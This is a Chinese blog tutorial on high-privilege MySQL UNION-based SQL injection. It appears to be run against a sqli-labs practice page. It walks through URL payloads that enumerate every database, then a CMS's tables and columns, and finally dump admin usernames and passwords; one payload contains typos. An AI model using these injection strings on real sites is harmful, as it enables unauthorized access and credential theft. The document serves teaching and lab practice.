MySQL注入之高权限注入


前言

在数据库中有database,schema,table,user,行,列容易被混淆之间的关系
他们之间的关系可以这样理解:
database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指这个家的主人

二、高权限注入

1.什么是高权限注入

在上一篇博文中有提到数据库的构成:
数据库A=网站A(同时又一个用户 A)
表名
列名
数据
数据库B=网站B(同时又一个用户B)
表名
列名
数据
这里的用户又分为普通用户和高级用户(eg.root),普通用户只能访问到自己库内的内容,而高级用户就可以做到跨库查询(就是对A,B库的内容都可以读取)

2.跨库查询思路

1.查看用户名

(之前步骤在上一篇博文中有就不进行重复)
是root所以可以进行高权限注入
在这里插入图片描述

2.获取所有的数据库名

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(schema_name),3 from information_schema.schemata

在这里插入图片描述

3.获取指定数据库名下的表名信息

这里我已’damicms‘为例

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=‘damicms’

在这里插入图片描述

4.获取指定damicms下的表名admin下的列名信息

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,gruop_concat(column_name),3 from information_schema.columns where
table_name=‘dami_admin’ and table schema=‘damicms’

在这里插入图片描述

4.获取damicms下的admin中的数据

我们要获取后台登陆信息一般都在admin下所以我们去获取admin的数据

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,username,password from damicms.dami_admin

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值